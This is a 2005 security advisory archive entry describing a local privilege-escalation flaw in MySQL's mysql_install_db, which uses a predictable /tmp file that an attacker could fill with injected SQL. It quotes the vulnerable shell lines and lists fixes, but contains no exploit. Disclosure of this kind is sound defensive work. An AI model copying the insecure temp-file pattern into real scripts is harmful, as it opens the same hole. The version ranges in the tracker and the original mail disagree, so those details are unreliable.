MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
|
|
SecurityTracker Alert ID: 1013995
|
|
SecurityTracker URL: http://securitytracker.com/id?1013995
|
|
CVE Reference: CAN-2005-1636
(Links to External Site)
|
Updated: Oct 5 2005
|
Original Entry Date: May 18 2005
|
Impact: User access via local system
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Version(s): prior to 4.1.12; 5.0 - 5.0.4
|
Description: Eric Romang (ZATAZ) reported a vulnerability in MySQL. A local user can modify the database during database installation.
The software uses an unsafe temporary file '/tmp/mysql_install_db.$$' during database creation. A local user can inject commands
to create database accounts with elevated privileges.
The vendor was notified on May 9, 2005.
The original advisory is available
at:
http://www.zataz.net/adviso/mysql-05172005.txt
|
Impact: A local user can create database accounts with elevated privileges in certain cases.
|
Solution: The vendor has released a fixed version (4.1.12), available at:
http://dev.mysql.com/downloads/
The specific Bitkeeper reference
for this bug is available at:
http://mysql.bkbits.net:8080/mysql-4.1/cset@1.2250?nav=index.html|ChangeSet@-1d
Red Hat has
issued a fix for Red Hat Enterprise Linux 4:
https://rhn.redhat.com/errata/RHSA-2005-685.html
|
Vendor URL: www.mysql.com/products/mysql/ (Links to External Site)
|
Cause: Access control error, State error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: "ZATAZ.net" <exploits@zataz.net>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 17 May 2005 12:46:29 +0200
From: "ZATAZ.net" <exploits@zataz.net>
Subject: MySQL < 4.0.12 && MySQL <= 5.0.4 : Insecure tmp file handling
|
--Apple-Mail-1-580636551
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
charset=US-ASCII;
delsp=yes;
format=flowed
#########################################################
MySQL mysql_install_db data manipulation
vendor: http://www.mysql.com
advisory: http://www.zataz.net/adviso/mysql-05172005.txt
vendor informed: yes exploit available:no
#########################################################
MySQL contain a security flaw how could
allow a malicious local attacker to inject arbitrary SQL commands
during database creation process.
For exemple : A malicious local attacker could create an mysql account
accessible from local (or everywhere) with ALL privileges on all
databases;
##########
versions:
##########
MySQL < 4.0.12
MySQL <= 5.0.4
##########
Solution:
##########
For MySQL 4.0.x update to the new version 4.0.12
MySQL 5.0.4 still vulnerable.
#########
timeline:
#########
discovered : 2005-05-07
vendor notified : 2005-05-09
vendor response : 2005-05-09
vendor fix : 2005-05-17
disclosure : 2005-05-17
#####################
Technical details :
#####################
tmp_file=/tmp/mysql_install_db.$$
Then on :
226 echo "use mysql;" > $tmp_file
227 cat $tmp_file $fill_help_tables | eval
"$mysqld_install_cmd_line"
228 res=$?
229 rm $tmp_file
#####################
Credits :
#####################
Eric Romang (eromang@zataz.net - ZATAZ)
Thxs to Gentoo Security Team. (Taviso, Sune, jaervosz, etc.)
|
|
